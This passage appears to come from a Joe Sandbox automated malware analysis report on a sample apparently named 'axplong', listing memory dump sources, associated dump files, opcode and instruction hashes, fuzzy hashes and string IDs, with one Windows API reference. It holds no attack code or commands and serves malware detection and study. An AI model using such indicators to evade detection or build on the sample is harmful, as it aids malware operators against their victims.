                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __floor_pentium4
                                                                                                                                                                                                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                          • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                          • Opcode ID: c1eede6202c2714473c98dce9c0f4b2763bd1e3b6a101b15fdf7de26ae1e15b6
                                                                                                                                                                                                                                          • Instruction ID: ce12b2ba08c7796ca460ff5ac2ae72827e32b26f94ef185b8e9c79671a2b4f8c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1eede6202c2714473c98dce9c0f4b2763bd1e3b6a101b15fdf7de26ae1e15b6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EEC21A72E0462D8FDF25CF28ED407A9B3B9EB88305F1441EAD54DA7280E775AE858F41
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                                                                                                                                                                                          • Instruction ID: 8c173ea201125afea0e2b2823a132298a056ba08c34ac5ce449930d48ceee6c2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF14F71E012199FDF14CF69D8847AEBBB5FF88314F258269D819AB384D731AE41CB90
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                          • API String ID: 0-2554083253
                                                                                                                                                                                                                                          • Opcode ID: 269ebf4cd42bb8b4eccee38473c39ce3e1b88b27b1be22886fe829a65fcd5802
                                                                                                                                                                                                                                          • Instruction ID: 71e41ab45b9db85b0066eb04cfcf45c85297ecd49ccecae2833974f1d16b8de8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 269ebf4cd42bb8b4eccee38473c39ce3e1b88b27b1be22886fe829a65fcd5802
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1CD1CE6558F3D04EC70387758EAA6817F70AE2312432E85DFD0C28FAE3D249595AD367
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                          • API String ID: 0-2554083253
                                                                                                                                                                                                                                          • Opcode ID: cc679c0231cbdfe9ddd77deb6c8c16f5a90a2cca16fb3b4bbdd2e0405a8bca9b
                                                                                                                                                                                                                                          • Instruction ID: 4a13558da6b22b73de2d3eddb7760b892e9281de578d1a0c22675f89f8703a2c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc679c0231cbdfe9ddd77deb6c8c16f5a90a2cca16fb3b4bbdd2e0405a8bca9b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FD1DE6558F3D04EC70387758EAA6817F70AE2312432E86DFD0C28FAA3D249595AD367
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                          • API String ID: 0-2554083253
                                                                                                                                                                                                                                          • Opcode ID: d438ab1e231af5c517c25370a3548707f11712f3b3ee7b47367ac068faab81d5
                                                                                                                                                                                                                                          • Instruction ID: c7c9625af18a36ae7f0330f228afd6bb4d0beae54d04240587bb51946a79fb15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d438ab1e231af5c517c25370a3548707f11712f3b3ee7b47367ac068faab81d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3C1D06558F3D04EC70387358EAA6817F70AE2312432E86DFD0C29FAE3D649595AC367
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                          • API String ID: 0-2554083253
                                                                                                                                                                                                                                          • Opcode ID: 08d6897997782cba982db4e7caec8fca299e25e00a7e6ab6ae0be177070f3444
                                                                                                                                                                                                                                          • Instruction ID: 9ecd802048cd1c3aef8c7b5b7d49011e6e7bd340779255bdd6495538d385dfbc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08d6897997782cba982db4e7caec8fca299e25e00a7e6ab6ae0be177070f3444
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19C1E06558F3D04FC70387358EAA6817F60AE2312432E86DFD0C29FAE3D649595AC367
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                          • API String ID: 0-2554083253
                                                                                                                                                                                                                                          • Opcode ID: 1e07c3a38280bddec46c52d3a1a4298ab0e71bfb8eb286199e2e05ae43fb7c0e
                                                                                                                                                                                                                                          • Instruction ID: 4ae0d9320192d89baaebea3b94be05975b268070c7b8d1ab890a249337ac7d43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e07c3a38280bddec46c52d3a1a4298ab0e71bfb8eb286199e2e05ae43fb7c0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39C1F06558F3D04EC70387758EAA6817F70AE1312432E86DFD0C28FAE3D649595AC367
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                          • API String ID: 0-2554083253
                                                                                                                                                                                                                                          • Opcode ID: 52e0e55f468f0b77c727e91d3e98694b553cbbd7b00e82eeac7aa604e52b3e98
                                                                                                                                                                                                                                          • Instruction ID: fd8b948780acddbc6b1508e2766c67f4ee8863544767247a338cf451548defc1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 52e0e55f468f0b77c727e91d3e98694b553cbbd7b00e82eeac7aa604e52b3e98
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B1E26459F3D00EC703873A8EAA6857F60AE1712432D86DFD0C28FAE3D249595BC367
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,009DCE55,?,?,?,?,009DCE8A,?,?,?,?,?,?,009DC400,?,00000001), ref: 009DCB06
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Time$FilePreciseSystem
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1802150274-0
                                                                                                                                                                                                                                          • Opcode ID: 0c1c6d48350ec2f4a40b48d3a32a90dc036064af48c3b2e63c67489a074fb0ab
                                                                                                                                                                                                                                          • Instruction ID: 0308af74e326bddad84e58c2d7012e81308ac0a31557f0665e5fa209575ee7b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c1c6d48350ec2f4a40b48d3a32a90dc036064af48c3b2e63c67489a074fb0ab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40D02232A8353853CA212BD8BC088FCBB0CAA01BA03288433ED0613220CAA59C02DBD0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455363098.0000000000E68000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4455541927.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9c0000_axplong.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                          • API String ID: 0-4108050209
                                                                                                                                                                                                                                          • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                          • Instruction ID: 16786917be02c1e68f3760c2679023a8e93bd030774479c81ae5e8c9618cf7b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F51377060C64D5ADB388AEC88967FEE79E9F41300F54089BE742DB6E2DB159D44C362
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.4452228796.00000000009C1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452167558.00000000009C0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452228796.0000000000A22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452503789.0000000000A29000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000A2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000BAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000C88000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CB7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CC0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4452577751.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.4454598928.0000000000CD0000.00000080.00000001.01000000.00000007.sdmpDownload File
